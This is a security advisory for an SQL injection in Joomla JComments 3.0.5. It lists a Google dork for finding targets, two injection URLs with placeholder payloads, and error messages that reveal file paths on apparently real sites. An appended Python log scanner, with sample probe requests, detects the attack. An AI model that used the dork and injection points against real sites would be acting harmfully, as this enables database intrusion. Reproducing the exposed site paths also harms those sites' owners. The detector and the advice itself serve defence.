- ####################################################################
- # Exploit Title : Joomla JComments Components 3.0.5 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 31/01/2019
- # Vendor Homepage : joomlatune.com
- # Software Download Link : joomlatune.com/jcomments-downloads.html
- # Software Information Link : extensions.joomla.org/extension/jcomments/
- # Software Version : 3.0.5
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_jcomments''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010305
- packetstormsecurity.com/files/151428/Joomla-JComments-3.0.5-SQL-Injection.html
- ####################################################################
- # Description about Software :
- ***************************
- JComments is released under the GNU GPL license and is distributed for free.
- The JComments is a powerful and easy to use AJAX based comment system
- for Joomla with flexible ACL, smiles, BBCodes and avatars support.
- ####################################################################
- # Impact :
- ***********
- Joomla JComments 3.0.5 component for Joomla! is prone to an SQL-injection vulnerability
- because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_jcomments&Itemid=[SQL Injection]
- /index.php?option=com_jcomments&task=rss&object_id=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Strict Standards: Non-static method JLoader::import() should not be
- called statically in /home1/swalestu/public_html/anime
- /libraries/joomla/import.php on line 29
- Warning: Creating default object from empty value in
- /data05/virt18853/domeenid/www.prospekt.ee/htdocs/old/plugins
- /system/nonumberelements/helpers/parameters.php on line 130
- Deprecated: preg_replace(): The /e modifier is deprecated, use
- preg_replace_callback instead in /data05/virt18853/domeenid
- /www.prospekt.ee/htdocs/old/libraries/joomla/filter/
- filterinput.php on line 501
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
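
For defenders reviewing web-server logs, the check below flags requests to `com_jcomments` in which the `Itemid` or `object_id` parameters named in the advisory are not plain integers. It is an added example, not part of the original paste or of JComments; the combined access-log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names as injection points for com_jcomments.
NUMERIC_PARAMS = ("Itemid", "object_id")
# Assumption: Apache/nginx "combined" access-log format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return {param: decoded value} for com_jcomments requests whose
    id parameters are anything other than ASCII digits."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "com_jcomments" not in query.get("option", []):
        return {}
    bad = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):  # parse_qs already URL-decodes
            if not re.fullmatch(r"[0-9]+", value):
                bad[name] = value
    return bad

def scan(lines):
    """Return (client_ip, url, bad_params) for each flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        bad = suspicious_params(m.group(1))
        if bad:
            hits.append((line.split(" ", 1)[0], m.group(1), bad))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Feb/2019:10:00:01 +0000] "GET /index.php?option=com_jcomments&task=rss&object_id=97 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [01/Feb/2019:10:00:05 +0000] "GET /index.php?option=com_jcomments&task=rss&object_id=97%27 HTTP/1.1" 500 812',
    '198.51.100.23 - - [01/Feb/2019:10:00:09 +0000] "GET /index.php?option=com_jcomments&Itemid=53%27 HTTP/1.1" 200 9000',
    '203.0.113.7 - - [01/Feb/2019:10:00:12 +0000] "GET /index.php?option=com_content&Itemid=53 HTTP/1.1" 200 7000',
]

if __name__ == "__main__":
    for ip, url, bad in scan(SAMPLE_LOG):
        print(ip, url, bad)
```

The same integer-only rule, enforced server-side before the value reaches a query, is the corresponding mitigation for CWE-89 on these two parameters.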